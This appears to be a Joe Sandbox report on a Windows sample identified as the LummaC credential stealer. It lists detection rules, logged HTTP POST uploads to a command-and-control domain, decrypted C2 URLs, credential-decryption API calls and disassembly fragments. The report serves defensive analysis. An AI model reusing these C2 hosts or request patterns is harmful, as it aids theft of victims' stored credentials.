JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.1499423252.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1429009276.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: https://featureccus.shop:443/bdMAn	Avira URL Cloud: Label: malware
Source: https://featureccus.shop/bdMAn	Avira URL Cloud: Label: malware

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 172.67.204.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49694 -> 172.67.204.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49698 -> 172.67.204.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49696 -> 172.67.204.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49700 -> 172.67.204.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49697 -> 172.67.204.104:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49702 -> 172.67.204.104:443

Source: global traffic	HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: featureccus.shop
Source: global traffic	HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3LEEVpaNMaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14889Host: featureccus.shop
Source: global traffic	HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C49ENFqui8hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15075Host: featureccus.shop
Source: global traffic	HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K499FGNsH7JDQRSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19952Host: featureccus.shop
Source: global traffic	HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=zRsUd1Wtfm4eo5rPrs2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2333Host: featureccus.shop
Source: global traffic	HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FL5I7kL4TdpZ472HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569918Host: featureccus.shop
Source: global traffic	HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 99Host: featureccus.shop

Source: global traffic	DNS traffic detected: DNS query: defaulemot.run
Source: global traffic	DNS traffic detected: DNS query: featureccus.shop

Source: file.exe	Virustotal: Detection: 43%			Perma Link
Source: file.exe	ReversingLabs: Detection: 42%

Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: defaulemot.run/jUSiaz
Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041B1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041B1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041B55A CryptUnprotectData,	2_2_0041B55A

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00411822
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-000000FEh]	2_2_0044D0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	2_2_004300B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	2_2_0044D960
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-25088CECh]	2_2_00412124
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	2_2_0044C1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+14h]	2_2_0040DA3A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+317AB538h]	2_2_0040DA3A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]	2_2_00420B40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+10h]	2_2_00420B40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, edx	2_2_0044C320
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_004373CB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0042CBB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	2_2_0041A430
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then lea eax, dword ptr [ecx-6C0B83CEh]	2_2_0040D780
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	2_2_0044C8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	2_2_004490EF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00440880
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx edx, byte ptr [ebx+ecx]	2_2_0044A88E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	2_2_0041E0AC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_0041E0AC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	2_2_0040E174
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	2_2_0044B900
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00429910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-38B2FA5Ch]	2_2_00432120
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00432120
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+12h]	2_2_0040C130
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp], ebx	2_2_004369C1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000B2h]	2_2_00410994
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	2_2_0041D99F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_0041D99F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	2_2_0044B9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	2_2_00448240
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+08h]	2_2_00448240
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6C0B83D6h]	2_2_00448240
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	2_2_0044BA40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	2_2_0041E2C6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, edi	2_2_00423A80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-79B0712Ah]	2_2_0042DAA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, word ptr [eax]	2_2_0042DAA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_0042DAA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004292A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	2_2_00444B60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, ecx	2_2_0041EB66
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+02h]	2_2_00411368
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041A370
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	2_2_0041D315
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+12EB444Ah]	2_2_0040FB20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	2_2_00408B20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_0042D32F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B12B9D2h]	2_2_0042F3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_0040A390
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_0040A390
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_0041B1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+03h]	2_2_00424430
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_004374D1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+5Dh]	2_2_0040DC9E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00432540
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041B55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	2_2_0041B55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	2_2_0041B55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_0041B55A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2Ch]	2_2_00430650
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-52h]	2_2_00430670
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00433EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_0041EEFE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	2_2_0041EEFE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	2_2_0044B680
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+03h]	2_2_00425F40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 8D94E5DFh	2_2_00444750
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	2_2_00444750
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	2_2_0040F769
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+02h]	2_2_00429F30
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68h]	2_2_0041FF37
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62h]	2_2_00412F82
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]	2_2_00422792
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	2_2_0044B790
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	2_2_0044B7A9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	2_2_0044B7AB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
file.exe